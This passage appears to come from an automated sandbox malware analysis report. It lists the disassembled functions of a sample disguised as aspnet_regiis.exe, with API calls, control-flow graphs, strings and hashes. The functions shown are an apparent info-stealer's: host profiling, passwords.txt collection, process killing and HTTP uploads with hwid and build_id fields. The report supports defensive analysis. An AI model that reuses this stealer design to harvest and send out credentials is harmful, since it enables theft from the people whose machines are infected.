                                                                                                                              • Part of subcall function 00410F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                                                                              • Part of subcall function 00410F51: RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                                                                                              • Part of subcall function 00410F51: RegCloseKey.ADVAPI32(00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410FAF
                                                                                                                              • Part of subcall function 00411007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0041107D
                                                                                                                              • Part of subcall function 00411007: wsprintfA.USER32 ref: 004110DB
                                                                                                                              • Part of subcall function 00410FBA: GetSystemInfo.KERNEL32(?), ref: 00410FD4
                                                                                                                              • Part of subcall function 00410FBA: wsprintfA.USER32 ref: 00410FEC
                                                                                                                              • Part of subcall function 00411119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
                                                                                                                              • Part of subcall function 00411119: HeapAlloc.KERNEL32(00000000), ref: 00411138
                                                                                                                              • Part of subcall function 00411119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                                                                              • Part of subcall function 00411119: wsprintfA.USER32 ref: 0041117A
                                                                                                                              • Part of subcall function 00411192: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111E9
                                                                                                                              • Part of subcall function 004114A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                                                                                              • Part of subcall function 004114A5: Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                                                                              • Part of subcall function 004114A5: Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                                                                              • Part of subcall function 004114A5: CloseHandle.KERNEL32(00000000), ref: 0041154D
                                                                                                                              • Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                                                                                              • Part of subcall function 00411203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                                                                              • Part of subcall function 00411203: wsprintfA.USER32 ref: 004112DD
                                                                                                                              • Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                                                                                              • Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                                                                              • Part of subcall function 00411203: lstrlenA.KERNEL32(?), ref: 00411347
                                                                                                                              • Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                                                                              • Part of subcall function 00411203: RegCloseKey.ADVAPI32(?), ref: 00411446
                                                                                                                              • Part of subcall function 00411203: RegCloseKey.ADVAPI32(?), ref: 00411472
                                                                                                                            • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000), ref: 00414563
                                                                                                                              • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                              • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$Alloc$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$AllocateCharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                            • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                            • API String ID: 3634126619-1014693891
                                                                                                                            • Opcode ID: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
                                                                                                                            • Instruction ID: 792dbb826b946587ba76db5a11b028a2a1d9662385358a0031bce88e61b043bf
                                                                                                                            • Opcode Fuzzy Hash: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
                                                                                                                            • Instruction Fuzzy Hash: 2A527D71D4001EAACF01FBA2DD429DDB7B5AF04308F51456BB610771A1DBB87E8E8B98
                                                                                                                            Function 0040884C Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 405memoryfilestringCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1774 40884c-408865 call 410795 1777 408867-40886c 1774->1777 1778 40886e-40887e call 410795 1774->1778 1779 408885-40888d call 410549 1777->1779 1783 408880 1778->1783 1784 40888f-40889f call 410795 1778->1784 1786 4088a5-408922 call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 1779->1786 1783->1779 1784->1786 1790 408d72-408d96 call 402920 * 3 call 401cde 1784->1790 1822 408939-408949 CopyFileA 1786->1822 1823 408924-408936 call 410519 call 4122b0 1822->1823 1824 40894b-408984 call 4104e7 call 410609 call 41058d call 402920 1822->1824 1823->1822 1837 408986-4089d7 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d 1824->1837 1838 4089dc-408a5b call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 410609 call 41058d call 402920 1824->1838 1871 408a60-408a79 call 402920 1837->1871 1838->1871 1880 408d4b-408d57 DeleteFileA call 402920 1871->1880 1881 408a7f-408a9a 1871->1881 1887 408d5c-408d6b call 402920 * 2 1880->1887 1889 408aa0-408ab6 GetProcessHeap RtlAllocateHeap 1881->1889 1890 408d37-408d4a 1881->1890 1898 408d6d call 402920 1887->1898 1892 408cda-408ce7 1889->1892 1890->1880 1900 408abb-408b9d call 4104e7 * 6 call 401cfd call 410519 call 40826d StrCmpCA 1892->1900 1901 408ced-408cf9 lstrlenA 1892->1901 1898->1790 1937 408ba3-408bb6 StrCmpCA 1900->1937 1938 408d97-408dd9 call 402920 * 8 1900->1938 1901->1890 1903 408cfb-408d27 call 401cfd lstrlenA call 410519 call 416e97 1901->1903 1914 408d2c-408d32 call 402920 1903->1914 1914->1890 1939 408bc0 1937->1939 1940 408bb8-408bbe 1937->1940 1938->1898 1942 408bc6-408bde call 410549 StrCmpCA 1939->1942 1940->1942 1949 408be0-408be6 1942->1949 1950 408be8 1942->1950 1952 408bee-408bf9 call 410549 1949->1952 1950->1952 1958 408c08-408cd5 lstrcatA * 14 call 402920 * 7 1952->1958 1959 408bfb-408c03 call 410549 1952->1959 1958->1892 1959->1958
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00410795: StrCmpCA.SHLWAPI(?,?,?,00408863,?,?,?), ref: 0041079E
                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00408941
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 004122B0: _memset.LIBCMT ref: 004122D7
                                                                                                                              • Part of subcall function 004122B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
                                                                                                                              • Part of subcall function 004122B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
                                                                                                                              • Part of subcall function 004122B0: CloseHandle.KERNEL32(00000000), ref: 00412392
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AA6
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00408AAD
                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00408B95
                                                                                                                            • StrCmpCA.SHLWAPI(?,004371E8), ref: 00408BAB
                                                                                                                            • StrCmpCA.SHLWAPI(?,004371EC), ref: 00408BD3
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00408CF0
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00408D0B
                                                                                                                              • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                              • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00408D4E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
                                                                                                                            • String ID: ERROR_RUN_EXTRACTOR
                                                                                                                            • API String ID: 2819533921-2709115261
                                                                                                                            • Opcode ID: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
                                                                                                                            • Instruction ID: 65d458a2be874082b650ad6ccfc12f730853009eff9118d7dbcfdf0fd3eb137e
                                                                                                                            • Opcode Fuzzy Hash: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
                                                                                                                            • Instruction Fuzzy Hash: CAE14F71A00209AFCF01FFA1ED4A9DD7B76AF04309F10502AF541B71A1DB796E958F98
                                                                                                                            Function 004169B6 Relevance: 38.7, APIs: 8, Strings: 14, Instructions: 249sleepCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                              • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 004168C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
                                                                                                                              • Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416925
                                                                                                                              • Part of subcall function 004168C6: StrStrA.SHLWAPI(00000000,?), ref: 0041693A
                                                                                                                              • Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416949
                                                                                                                              • Part of subcall function 004168C6: lstrlenA.KERNEL32(00000000), ref: 00416962
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AA0
                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AF9
                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B59
                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BB2
                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BC8
                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BDE
                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BF0
                                                                                                                            • Sleep.KERNEL32(0000EA60), ref: 00416BFF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$lstrcpy$Sleep
                                                                                                                            • String ID: .vA$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
                                                                                                                            • API String ID: 2840494320-4129404369
                                                                                                                            • Opcode ID: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
                                                                                                                            • Instruction ID: 3295cb3038e640ef7bf1334207e300efc9412b34fd4a8ee3f001cefdb945b7ae
                                                                                                                            • Opcode Fuzzy Hash: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
                                                                                                                            • Instruction Fuzzy Hash: A9915F31E40119ABCF10FBA6ED47ACC7770AF04308F51502BF915B7191DBB8AE898B98
                                                                                                                            Function 0040852E Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 230stringmemoryfileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 004085D3
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408628
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 0040862F
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 004086CB
                                                                                                                            • lstrcatA.KERNEL32(?), ref: 004086E4
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 004086EE
                                                                                                                            • lstrcatA.KERNEL32(?,0043719C), ref: 004086FA
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00408704
                                                                                                                            • lstrcatA.KERNEL32(?,004371A0), ref: 00408710
                                                                                                                            • lstrcatA.KERNEL32(?), ref: 0040871D
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00408727
                                                                                                                            • lstrcatA.KERNEL32(?,004371A4), ref: 00408733
                                                                                                                            • lstrcatA.KERNEL32(?), ref: 00408740
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 0040874A
                                                                                                                            • lstrcatA.KERNEL32(?,004371A8), ref: 00408756
                                                                                                                            • lstrcatA.KERNEL32(?), ref: 00408763
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 0040876D
                                                                                                                            • lstrcatA.KERNEL32(?,004371AC), ref: 00408779
                                                                                                                            • lstrcatA.KERNEL32(?,004371B0), ref: 00408785
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 004087BE
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040880B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                            • String ID: passwords.txt
                                                                                                                            • API String ID: 1956182324-347816968
                                                                                                                            • Opcode ID: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
                                                                                                                            • Instruction ID: 9a12f6b0eacbcb2ed4cda68e664cf834d7366407d3e9ed4d657f0b87806d2d42
                                                                                                                            • Opcode Fuzzy Hash: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
                                                                                                                            • Instruction Fuzzy Hash: A2814032900208AFCF05FFA1EE4A9CD7B76BF08316F205026F501B31A1EB7A5E559B59
                                                                                                                            Function 00404B2E Relevance: 35.4, APIs: 12, Strings: 8, Instructions: 378networkstringfileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 2315 404b2e-404bf3 call 410519 call 404ab6 call 4104e7 * 5 InternetOpenA StrCmpCA 2330 404bf5 2315->2330 2331 404bfb-404c01 2315->2331 2330->2331 2332 405194-405236 InternetCloseHandle call 402920 * 8 call 41d016 2331->2332 2333 404c07-404d91 call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 2331->2333 2333->2332 2402 404d97-404dd1 HttpOpenRequestA 2333->2402 2403 404dd7-404ddd 2402->2403 2404 405188-40518e InternetCloseHandle 2402->2404 2405 404dfb-40511a call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 4104e7 call 4105c7 * 2 call 41058d call 402920 * 2 lstrlenA * 2 HttpSendRequestA 2403->2405 2406 404ddf-404df5 InternetSetOptionA 2403->2406 2404->2332 2509 40515c-405174 InternetReadFile 2405->2509 2406->2405 2510 405176-405183 InternetCloseHandle call 402920 2509->2510 2511 40511c-405124 2509->2511 2510->2404 2511->2510 2513 405126-405157 call 410609 call 41058d call 402920 2511->2513 2513->2509
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                              • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                              • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
                                                                                                                            • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404DF5
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                            • lstrlenA.KERNEL32(?,00436953,",build_id,004377C4,------,004377B8,",hwid,004377A4,------), ref: 004050EE
                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
                                                                                                                            • HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
                                                                                                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00405177
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 0040518E
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 0040519A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
